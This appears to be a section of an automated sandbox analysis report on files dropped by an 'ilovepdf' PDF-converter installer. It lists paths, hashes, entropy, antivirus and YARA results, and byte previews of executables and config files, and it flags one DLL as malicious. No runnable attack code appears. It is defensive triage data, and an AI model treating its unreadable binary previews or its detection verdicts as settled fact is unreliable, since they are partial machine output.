                                                                                  SSDEEP:49152:9ZZ3wvJUUa5ooBLYnx6f8PT+YZtU+kGVSILs62bq9qKJ:N6mUa5xyx1qaU+kGMIXFR
                                                                                  MD5:A68BB111B9DE5443AE19116145289BDA
                                                                                  SHA1:5CD5B056CAF0973ABD680E822F03803002F579D1
                                                                                  SHA-256:DDF297FD3D6992472BEB1EAB3314E4A86223C29BB6945EE11617F003312BF4C7
                                                                                  SHA-512:764B2593056CC1ABA05BD7D52B7EA3C77C5DF3B47C05E27E0CE4DB23F383EB82DB64818308CB9DCE069059C9449C834A5354DB28A2EFF5211B849BFD7BC3AE07
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... .FuN.FuN.FuN.a.#.HuN.a.5.YuN.FuO.TvN.X'.muN.X'..uN.X'..tN.X'.duN.X'.GuN.X'.GuN.RichFuN.........................PE..L.....^.................D...~..............`....@..........................P(..... D(...@.................................L...@.......@.............'.......%..}...k..................................@............`..p......@....................text....C.......D.................. ..`.rdata..v....`.......H..............@..@.data...............................@....rsrc...@............P..............@..@.reloc..\b....%..d...b%.............@..B................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Program Files (x86)\ilovepdf\is-005RG.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6728
                                                                                  Entropy (8bit):7.972168290563647
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:S6xsUwW7fQhpXfowbgIASYwyLEeBFv9lfS4WI9XM7TYVzUBPD/pskUDVERqd/8FI:S6x0h5w9yyL37SwM7TnBbOt2SOI
                                                                                  MD5:9B1AF1946FA721CE91ECEC1B10F8D843
                                                                                  SHA1:D9D88F38CD261CE62BD54655E157A66282147B95
                                                                                  SHA-256:BF78A435C93B5B0152BCA1F3A44DB2977A8FD03CE41377FFDDF3559B8B6D39AE
                                                                                  SHA-512:2A3369C58463CF0F4DDFAFBB0A9DC3001AA4563E34330AF1CE71611E865DE3C9AFF1CCB7F5302871C1E830D9A2AB1ACF391920F81B0DC49719681461F25109F7
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ......Q.CF,.X....i...R.]...s(....9.'..j^...Y$..p..QL.z.X...n.......tM(........woF7.f0.?....t9...Yy9.VZ.dRO~.K.I....p..gC..).e......h..}....(...C..bM....U.}....)..8.........M&..%0(...&..uet%.L.....?.W.W....1I.....Z.M...Z..NcL.F...Ix.a.....x.W-..R .]S..w....C..j.k.O.....}.m.;E&..{....>^....P..:k.S.7@e... .SH..f`.....bs..m..t.o...H..Zm...~....#g;....-..h.B.....MOL.."3gXG.8..Wx.,..j..W.UV.4.H.0.k..U.3c.wf.F.W..1..A..0....q+S....y.c...+.\h.N.......a.......l....oB......|...$.*.\C......./.;=...z..m...=."0j..B....<....h.V.....B..e.@.l..b....Y.W^2M.....zf..D..2T.c..=.bZS..5.5....ky$_F*$V$..l.....'FwU..S.}.../(.......lG;..t#......P".E..'.....wj...8...4...w@K.....W...Q...,>_.&.......b.Q..L.m.>.hm+...J.g%"_jZ.L.r'....U}....[2GJ..)+..K...@.B%.B.N....'U6at....[...S..S..8.t......Q.._..E..\'...u...e...;..0f|."...H.D..+.#....G_.[N.....C*..%..ga...:..m.&....7...D{..}a;....x.|....'.. jU..^.'.l$..........g^p9M.....t...2x....S".5......3.d.5...*...."..K+L
                                                                                  C:\Program Files (x86)\ilovepdf\is-30MA7.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):921600
                                                                                  Entropy (8bit):7.929650404687928
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:9MIjKyNtCBdD3dMJ5QXWdWN2n3ROQ94EnNyYSsjHGHTnFha3sIvx7D+IE4uBwL8i:9fCXdwQGh74EniLHa3z5eaLo0L9K
                                                                                  MD5:814EF2BDB0199A7B950E3ECB650E9E29
                                                                                  SHA1:89460EE7A16E6682721E1C59D194DFBE05D35FD1
                                                                                  SHA-256:6F7D45E4ABEE103049E50E8BF9AB3E36B9C0D5044FDAB3B1B37766017ED5E4DF
                                                                                  SHA-512:90E082F14F677CC7C34D7F71623E9C86084E714F288F941C6603CE63DD2AA28A6B16959E5B3E9F849BFC0A82A6F8F9AC5F7D64E28AF310E373BF8ADD3610281E
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$............g...g...g...o...g..`o...g...D...g...o...g..`o...g...g..re..mp...g..mp..=g..mp...g...F...g...k...g...C..wg...C...g...k...g..mp...g..mp...g...l...g..mp...g..Rich.g..................PE..L...".H...........!......... ......`.#.......#...............................#.......................................#.....$.#.......#.$.....................#.............................................................(~..@...................UPX0....................................UPX1................................@....rsrc.... ....#.....................@......................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                                  C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):706560
                                                                                  Entropy (8bit):7.921985342568425
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:h+7aMyDxl1EputZ69u+sC4pdFANpBnNw7AMoFg8gb+CdofxMtauAjAMmyEDYHg36:hrVl1EpsZqQdSNpBnW7tPJeAlDYIqpv
                                                                                  MD5:19C9680AC9642A8105096ED9C1C5C71C
                                                                                  SHA1:1B4D55F5D372AB0E7532E2F4613BA1B767B4AC80
                                                                                  SHA-256:ABBFC12837B138DA3DC66D5D6032D1183FC947FBEEC22DF0EC71B6120FC1B769
                                                                                  SHA-512:2BCE8C3F3260E28D0B807C7EB1C1B271904FE45AE2D5366C47F6C72C13E070D40E1D5C6C00D37967DA0C33E3408CFDF6F23AFAC3975C8817030CF90F9355DC55
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./,.4kM.gkM.gkM.g]k.giM.g.Q.gaM.gkM.giM.g.R.giM.g.Q.gcM.g.R.goM.g.R.giM.gmn.g.M.gkM.g.M.g.B.gxM.g]k.g.M.g]k.g.M.g.K.gjM.g.m.gjM.gRichkM.g........PE..L...I..I...........!.........P.......... ..............................................................................A.................................t.......................................................................................UPX0....................................UPX1......... ...~..................@....rsrc....P.......F..................@..............................................................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                                  C:\Program Files (x86)\ilovepdf\is-93C0J.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):1209344
                                                                                  Entropy (8bit):7.922981354856275
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:ngTRboPdLcaUHa3XRIXmpTpoCenCZjMRHIpU8OKhT6ZbKoD97ST5S0LX/68cBDk:nuo1LcFis8pSgUR4CuI97sS07/Nww
                                                                                  MD5:B4BFDBB19C4E1A089F51577D193A9F42
                                                                                  SHA1:3E6B4C547289BD39A84CD7A73A8FCFDF72C0C442
                                                                                  SHA-256:8549924223C77E4C52EC83E4BC2845FA9F7C571934423C27CA0D4BFED0EEB451
                                                                                  SHA-512:0D85E0AC1D65A92083523C32F275BBF40D1380B608551DACFA41037691FCE230FF1D6AF3E3B263BCC274D7C935581B0328563627A9D7EBFDE14B6E85F56416B4
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: C:\Program Files (x86)\ilovepdf\is-93C0J.tmp, Author: Florian Roth
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W!.c.@n0.@n0.@n0...0.@n04..0)@n0.O10.@n0.O30.@n0.@o0"Bn04..0.@n04..0.An04..0.An04..0.@n04..0.@n04..0.@n0Rich.@n0........PE..L....h.N...........!.............. ..z2... ...2..............................@3...........@..........................2.....(.2.......2.(...................t03......................................|2.H...........................................UPX0...... .............................UPX1.......... .....................@....rsrc.........2.....................@......................................................................................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                                  C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):2613752
                                                                                  Entropy (8bit):6.715454660240232
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:9ZZ3wvJUUa5ooBLYnx6f8PT+YZtU+kGVSILs62bq9qKJ:N6mUa5xyx1qaU+kGMIXFR
                                                                                  MD5:A68BB111B9DE5443AE19116145289BDA
                                                                                  SHA1:5CD5B056CAF0973ABD680E822F03803002F579D1
                                                                                  SHA-256:DDF297FD3D6992472BEB1EAB3314E4A86223C29BB6945EE11617F003312BF4C7
                                                                                  SHA-512:764B2593056CC1ABA05BD7D52B7EA3C77C5DF3B47C05E27E0CE4DB23F383EB82DB64818308CB9DCE069059C9449C834A5354DB28A2EFF5211B849BFD7BC3AE07
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... .FuN.FuN.FuN.a.#.HuN.a.5.YuN.FuO.TvN.X'.muN.X'..uN.X'..tN.X'.duN.X'.GuN.X'.GuN.RichFuN.........................PE..L.....^.................D...~..............`....@..........................P(..... D(...@.................................L...@.......@.............'.......%..}...k..................................@............`..p......@....................text....C.......D.................. ..`.rdata..v....`.......H..............@..@.data...............................@....rsrc...@............P..............@..@.reloc..\b....%..d...b%.............@..B................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Program Files (x86)\ilovepdf\is-DKEKO.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):571917
                                                                                  Entropy (8bit):7.966052994665358
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:/HegB06gEPizUsFEjR79m3qMkrnkIClgWoZmGjKo2Dt5psSjd:/+i06g8oUsFElpm3dw1ClFrg2Dt59d
                                                                                  MD5:BDE9F29D164449ADA1DF3BECD54E4337
                                                                                  SHA1:F104C62DE429CF02A3DFEE203122BD6FDE88B1F3
                                                                                  SHA-256:634DD50A6002D5E328D595E04C16B88D351AB7577C25C8FA674420D9BB57D896
                                                                                  SHA-512:7AA0B7E47DFA4FE25E9FF613865AE35DA00D6651BDA27A6B4F7DD30E6A6ABFB66B5BD2C7C9A5C9871DBBCE30CAA24CE885C3650DC2D860A60E09D33113449C25
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ....Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V..*.)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..j*j.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i|..y.Q'....k...}FT.X.jY..Y....o......y..=|6..%..z/........s....>.j.-s.k../.:..........>|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...|/h..jfDX.S...`&*...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^..*.....aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./
                                                                                  C:\Program Files (x86)\ilovepdf\is-IDUEM.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):178
                                                                                  Entropy (8bit):5.200654239805503
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:cFfdXP+FFFKMlFsPR4GXXyWRXlQFSLKbFUuAvF9IZZDKh+sWGXViKWVV9uMv:iV2FFFKMfsp7i22SLKbFUPvYWhpBFiZz
                                                                                  MD5:23872B81B308F0615E32E9EC60B8F806
                                                                                  SHA1:3989CA350F25FA4703573AD07AFBE99DECA43C98
                                                                                  SHA-256:BC528E642062193291745A32FFDF899BF420F556562BF18774B67615DF2A56E2
                                                                                  SHA-512:6357529877B355F724D390117FE19250344B7322098476D30F50D59381956345189E26DCB6618E610F0755C4C9819CAAC5D1323C82F3936FA028D7F3198C3A20
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <config>.. <current Dat="1351852478" />.. <Dat Txt="&#x0A;What&apos;s New: We are waiting for your feedbacks -&gt; ||&#x0A;http://unipdf.com/support/&#x0A;" />..</config>..
                                                                                  C:\Program Files (x86)\ilovepdf\is-JDQA9.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3038269
                                                                                  Entropy (8bit):6.3798753919324795
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:nLJwSihjOb6GLb4SKEs3DyOMC2DlUt0+yO3A32ASNTvu/:FwSi0b67zeCzt0+yO3kSs
                                                                                  MD5:F6783D6BAD48D0F022DDB2C0A5819087
                                                                                  SHA1:FD1E4D2EBCC11D98ADAA75797527BA7E8DA5DC59
                                                                                  SHA-256:DAFBDF676A506C8743F4A93E81C927075101A172CBB8B3E8BCCF867D4D270B2B
                                                                                  SHA-512:67C53D7F3A0190E7A9B3FAD2B6E404EF7E0D67536210561B23F98C16C3EA4E4CEFEC8FF475FE318AA5C7466554E349ED5A6E5897576520A490346E7DAF02800A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...p.._.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...P.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................
                                                                                  C:\Program Files (x86)\ilovepdf\is-RD093.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):86057
                                                                                  Entropy (8bit):5.650674653880301
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RxBKLWBVtFt475GbZj30O7CXBCZSCfo4nfKTbvAbFTggiHdtz2SkZSvNc/YM/tdI:R7e2wlTbYbF24iZFazDIMv9AV
                                                                                  MD5:57694C4A03C977B96DF390DE8C5D1FE2
                                                                                  SHA1:41DF5F6423C637D1B27EDEE5CB966AB5F9EF7415
                                                                                  SHA-256:C9D6544A89762E7E8EFF3A3D6F47D744AEF72B01D6A7F1D3607F86D701B226BA
                                                                                  SHA-512:555B382E03121461E5B110D2CB72F3B072A492C386E25DC1CBC726035E4566945AE0F93D2355B318A8CC71CDBBEF5F45DC49EFCA6FCD21865B3BD369A9BA270D
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>....<language>.. <Set Index="1" text="English">.. <txt BtnID="1">Add</txt>.. <txt BtnID="2">Remove</txt>.. <txt BtnID="3">Clear</txt>.. <txt BtnID="4">Open Folder</txt>.. <txt BtnID="5">File Name</txt>.. <txt BtnID="6">Size</txt>.. <txt BtnID="7">Total Pages</txt>.. <txt BtnID="8">Selected Pages</txt>.. <txt BtnID="9">Status</txt>.. <txt BtnID="10">Home</txt>.. <txt BtnID="11">Settings</txt>.. <txt BtnID="12">Convert</txt>.. <txt BtnID="13">Word</txt>.. <txt BtnID="14">Image</txt>.. <txt BtnID="15">Text</txt>.. <txt BtnID="16">HTML</txt>.... <txt BtnID="17">Language</txt>.. <txt BtnID="18">Save Path</txt>.. <txt BtnID="19">Image Format</txt>.. <txt BtnID="20">Word Format</txt>.. <txt BtnID="21">Default</txt>.. <txt BtnID="22">Select</txt>.. <txt BtnID="23">Save</txt>.... <txt BtnID="24">Please add at least one PDF file.</txt>.. <txt BtnID="25">Output Format:</txt>.... <t
                                                                                  C:\Program Files (x86)\ilovepdf\is-TSARV.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):484
                                                                                  Entropy (8bit):3.262742514495205
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:fI+PciIrJRFWEXoPcZ0qLJxpPcZ0qm/LVpPcZ0qHJxpPcZ0qc/8Xn+PcoINJRFOy:pSJRRBNaE/LsBa+/G1JREovn
                                                                                  MD5:147C02BD59F90777A43F77C711145711
                                                                                  SHA1:299BC5A77CF4BB06FE123F70FC1EC643ECA6FCC2
                                                                                  SHA-256:F7077388D0CC1928FA1759C91A5396D87D282A78843F1330456FB3809C2E12FA
                                                                                  SHA-512:7A274D979C67437C9CD4148C85C7FBC62D2DEFF26E730158D93F3EBF3B89A070A415305DC708FBE9991EF0BB0C870D13518887E17DCF937C54A7F6AFF83A8D97
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: #-------------------2021-10-11 19:01:13-------------------#program start..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary th.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary ti.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary tt.dll OK!..#-------------------2021-10-11 19:01:14-------------------#LoadLibrary tw.dll Error:126..#-------------------2021-10-11 19:01:17-------------------#program end..
                                                                                  C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                  Category:dropped
                                                                                  Size (bytes):924672
                                                                                  Entropy (8bit):7.929559685251935
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:GEg1DE1gGL9ZK4c/hNXZwPruWXXIKPw5:GE0E1gk3UVGPr/XdY
                                                                                  MD5:9CCAD979D2030F7BB09CFE8CDC174D8D
                                                                                  SHA1:EF047862787F0C5F813D2ECBB9106F751FB6B6C8
                                                                                  SHA-256:EACDDCAE0D5FD7613164A4BD4852280903A1E374CBA7D1A8DAA2369AB953BA13
                                                                                  SHA-512:D54C01F5390DBA87C559BC269B192B80C6BB75D222AD30DC21014EEA2815EB686ED9A4819C44BB60F8BC8F5943D782F7A5D9CFA59BC395343C67368DD4D0A680
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 4%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$............g...g...g...o...g..`o...g...D...g...o...g..`o...g...g..re..mp...g..mp..=g..mp...g...F...g...k...g...C..wg...C...g...k...g..mp...g..mp...g...l...g..mp...g..Rich.g..................PE..L..._.H...........!......... ........#.......#...............................#.......................................#.....L.#.......#.L.....................#.................................................................@...................UPX0....................................UPX1................................@....rsrc.... ....#.....................@......................................................................................................................................................................................................................................................................................................................3.08.UPX!....
                                                                                  C:\Program Files (x86)\ilovepdf\is-VCRNI.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):288
                                                                                  Entropy (8bit):4.155730210419504
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:iNofEsshqwofAhd/2vWOZCvRSaubS8JvObSyo8du:i6fdso9wl2vhZ+RSdOYmO78du
                                                                                  MD5:B5D5DA176844BFE5FA47A1727E7CB8BC
                                                                                  SHA1:A7B7EE512E6DBC46603CD7830152C69D39D2CACB
                                                                                  SHA-256:FC0D68DD98F86BEA1B9699424FCE2C5F747E31419451404E9A9B83ED13394D42
                                                                                  SHA-512:BC1A5D218DA9D6BE1CACF237C522D98190C76C946A080F3555B94217EBA112A1995D3AB4710D605937171C3A7D85B28FA874C699B00EB367BACC6E5241CA5503
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <config>.. <UserDefine>.. <Language ID="0" />.. <Path PathSet="2" Path="" />.. <ImageFormat set="2" />.. <Res set="96" />.. <bit set="24" />.. <Prefix set="" />.. <Doc set="1" />.. <Help set="1" />.. </UserDefine>..</config>..
                                                                                  C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81920
                                                                                  Entropy (8bit):6.269784738862521
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:oRFWJWMpBI67M4/rv1vk3YqSQYysW3cdwA6wtFWk7Rf3:VpBVo4TF1wrwtFWAR/
                                                                                  MD5:7C1BC166ADD4A21620355A166EF7AD10
                                                                                  SHA1:75D92843D23795BBE9FC69ECF8C39B471C8FB1C3
                                                                                  SHA-256:64C03F2D267F6FB73C061B8C2353521D16B60F48876E83F9286026DF96241F24
                                                                                  SHA-512:9BE7DD2641F829DA11086E50CD2B9D14FA626227F1E4DEB5B9C79A66000D192C6126B0845DC87FC0A024DA34236FAAC44D7AEF9DB80DE9DF4D6DEE400310BCE2
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 9%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 26%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L...".".".'...".'....".'...".>.!.".>.'.".>.&."....".#..".&.+.".&.".".&..."...".&. .".Rich..".................PE..L.....da...........!................. ....................................................@..........................$......x%..(....p..................................8...................D...........@............................................text.../........................... ..`.rdata...[.......\..................@..@.data...<....0....... ..............@....tls.........P.......(..............@....gfids.......`.......*..............@..@.rsrc........p.......,..............@..@.reloc...............0..............@..B........................................................................................................................................................................................................
                                                                                  C:\Program Files (x86)\ilovepdf\language.xml (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):86057
                                                                                  Entropy (8bit):5.650674653880301
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:RxBKLWBVtFt475GbZj30O7CXBCZSCfo4nfKTbvAbFTggiHdtz2SkZSvNc/YM/tdI:R7e2wlTbYbF24iZFazDIMv9AV
                                                                                  MD5:57694C4A03C977B96DF390DE8C5D1FE2
                                                                                  SHA1:41DF5F6423C637D1B27EDEE5CB966AB5F9EF7415
                                                                                  SHA-256:C9D6544A89762E7E8EFF3A3D6F47D744AEF72B01D6A7F1D3607F86D701B226BA
                                                                                  SHA-512:555B382E03121461E5B110D2CB72F3B072A492C386E25DC1CBC726035E4566945AE0F93D2355B318A8CC71CDBBEF5F45DC49EFCA6FCD21865B3BD369A9BA270D
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>....<language>.. <Set Index="1" text="English">.. <txt BtnID="1">Add</txt>.. <txt BtnID="2">Remove</txt>.. <txt BtnID="3">Clear</txt>.. <txt BtnID="4">Open Folder</txt>.. <txt BtnID="5">File Name</txt>.. <txt BtnID="6">Size</txt>.. <txt BtnID="7">Total Pages</txt>.. <txt BtnID="8">Selected Pages</txt>.. <txt BtnID="9">Status</txt>.. <txt BtnID="10">Home</txt>.. <txt BtnID="11">Settings</txt>.. <txt BtnID="12">Convert</txt>.. <txt BtnID="13">Word</txt>.. <txt BtnID="14">Image</txt>.. <txt BtnID="15">Text</txt>.. <txt BtnID="16">HTML</txt>.... <txt BtnID="17">Language</txt>.. <txt BtnID="18">Save Path</txt>.. <txt BtnID="19">Image Format</txt>.. <txt BtnID="20">Word Format</txt>.. <txt BtnID="21">Default</txt>.. <txt BtnID="22">Select</txt>.. <txt BtnID="23">Save</txt>.... <txt BtnID="24">Please add at least one PDF file.</txt>.. <txt BtnID="25">Output Format:</txt>.... <t
                                                                                  C:\Program Files (x86)\ilovepdf\sqlite.dat (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):571917
                                                                                  Entropy (8bit):7.966052994665358
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:/HegB06gEPizUsFEjR79m3qMkrnkIClgWoZmGjKo2Dt5psSjd:/+i06g8oUsFElpm3dw1ClFrg2Dt59d
                                                                                  MD5:BDE9F29D164449ADA1DF3BECD54E4337
                                                                                  SHA1:F104C62DE429CF02A3DFEE203122BD6FDE88B1F3
                                                                                  SHA-256:634DD50A6002D5E328D595E04C16B88D351AB7577C25C8FA674420D9BB57D896
                                                                                  SHA-512:7AA0B7E47DFA4FE25E9FF613865AE35DA00D6651BDA27A6B4F7DD30E6A6ABFB66B5BD2C7C9A5C9871DBBCE30CAA24CE885C3650DC2D860A60E09D33113449C25
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ....Hh.j...?...O}3..8v,)cml.T/.....V.r.....n.?y..oz#V......N.{.....!....Y."..)v.T.........Ub.V..*.)..8..,.%.{4.yWrA.a36&..,...V...l9.y....39.y...wW.j.ox.....I..;..%..p.b..>..j.....j..awT..r...j....o./.7...,=uk..i../h..j*j.P.j..?.-X.k..R}.j.5.b-F.k..c........j...j..Q?...).qe......,o'k.....j.J..))O.......k..\.....u,..k...,..k....k...tOT.X.jXe-.k..7.k...83U.......%..o.....Y%.....7.F.(j...KP..I..j..y...o..no......z......u/..DJP.e+.Dj..Z....k.......j$T.X.j[..`....o....k{..2|6...H.....c%..........z......~^..j.-s.....o.-........6.L.`.j.-s.....i|..y.Q'....k...}FT.X.jY..Y....o......y..=|6..%..z/........s....>.j.-s.k../.:..........>|/...h...2/..R..-......k....9.y.....j.6Z.j.o....l&..%.UD..`....&..t>".6g..j,..../W=..5...n.......X..h>.k..'...|/h..jfDX.S...`&*...Y....)U]bc[......'(..l..+....b.i....[...If!S...r......i.....Q^..*.....aeddT.`.'....*.[.h....e...?>....n....5......-..j..T..ow......k....-...k16.+i(~..L....j,...c.L./w=j...~./
                                                                                  C:\Program Files (x86)\ilovepdf\sqlite.dll (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81920
                                                                                  Entropy (8bit):6.269784738862521
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:oRFWJWMpBI67M4/rv1vk3YqSQYysW3cdwA6wtFWk7Rf3:VpBVo4TF1wrwtFWAR/
                                                                                  MD5:7C1BC166ADD4A21620355A166EF7AD10
                                                                                  SHA1:75D92843D23795BBE9FC69ECF8C39B471C8FB1C3
                                                                                  SHA-256:64C03F2D267F6FB73C061B8C2353521D16B60F48876E83F9286026DF96241F24
                                                                                  SHA-512:9BE7DD2641F829DA11086E50CD2B9D14FA626227F1E4DEB5B9C79A66000D192C6126B0845DC87FC0A024DA34236FAAC44D7AEF9DB80DE9DF4D6DEE400310BCE2
                                                                                  Malicious:false
                                                                                  Reputation:unknown
